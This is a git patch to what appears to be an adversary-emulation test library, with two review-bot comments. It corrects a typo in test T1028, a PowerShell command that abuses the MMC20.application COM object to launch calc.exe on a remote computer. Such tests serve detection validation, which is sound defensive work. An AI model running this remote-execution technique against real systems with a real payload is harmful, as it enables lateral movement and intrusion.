From c8520ab1af10b5d4fedc2415b7d20ebc8a6f0778 Mon Sep 17 00:00:00 2001 From: Jeremy Brooks Date: Wed, 6 May 2020 12:26:34 -0400 Subject: [PATCH] fix type in T1028 command (#976) Co-authored-by: Carrie Roberts --- atomics/T1028/T1028.md | 2 +- atomics/T1028/T1028.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index 43d82678..01e3962c 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -67,7 +67,7 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer. ```powershell -[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") +[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ``` diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 32c67e10..4c5eca8e 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -40,7 +40,7 @@ atomic_tests: executor: name: powershell command: | - [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") - name: WMIC Process Call Create description: |
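Review bot: In atomics/T1028/T1028.md, the context line directly above the corrected command still reads "cmd will spawn calc.exe on a remote computer", yet the block is fenced as powershell and the call goes through the MMC20.application COM object rather than cmd. Since this change already touches the test text, reword that description to name the PowerShell executor so the expected behaviour is unambiguous to anyone validating detections against this test.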
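Review bot: In atomics/T1028/T1028.yaml, the executor block for this test contains only `name: powershell` and `command:`, and the next entry ("WMIC Process Call Create") begins immediately afterwards, so nothing closes the calc.exe that a successful run leaves on #{computer_name}. Consider adding a cleanup_command to this executor that terminates the spawned process on the remote host, so repeated runs of the test do not leave stray processes behind. The subject line also says "fix type" where "fix typo" appears to be meant.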